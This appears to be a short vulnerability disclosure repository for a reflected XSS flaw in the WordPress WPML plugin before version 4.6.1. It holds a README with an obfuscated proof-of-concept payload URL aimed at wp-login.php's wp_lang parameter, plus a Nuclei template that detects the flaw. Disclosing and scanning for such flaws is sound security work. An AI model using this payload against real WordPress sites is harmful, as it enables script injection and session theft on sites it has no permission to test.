├── README.md
└── wpml.yaml


/README.md:
--------------------------------------------------------------------------------
 1 | WordPress Plugin WPML Version < 4.6.1  RXSS vulnerability
 2 | 
 3 | Found by :- 
 4 | @bug_vs_me
 5 |  and 
 6 | @falcon_charan
 7 |  on 13th MArch 2023
 8 | 
 9 | Nuclei template:- https://github.com/bug-vs-me/nuclei/blob/main/wpml.yaml
10 | 
11 | and payload:-
12 |  https://xxxxxxx/wp-login.php?wp_lang=%20=id=x+type=image%20id=xss%20onfoc%3C!%3Eusin+alert(0)%0c
13 | 


--------------------------------------------------------------------------------
/wpml.yaml:
--------------------------------------------------------------------------------
 1 | id: wp-xss
 2 | 
 3 | info:
 4 |   name: wp-xss
 5 |   author: deepak aka bugvsme
 6 |   severity: high
 7 |   description: WordPress Plugin WPML Version < 4.6.1  RXSS vulnerability
 8 |   reference:
 9 |     - xss
10 |   remediation: update plugin to latest version
11 |   tags: xss
12 | 
13 | requests:
14 |   - method: GET
15 |     path:
16 |       - '{{BaseURL}}/wp-login.php?wp_lang=en_US%27'
17 | 
18 |     matchers-condition: and
19 |     matchers:
20 |       - type: status
21 |         status:
22 |           - 200
23 | 
24 |       - type: word
25 |         part: body
26 |         words:
27 |           - '#039;"='
28 | 


--------------------------------------------------------------------------------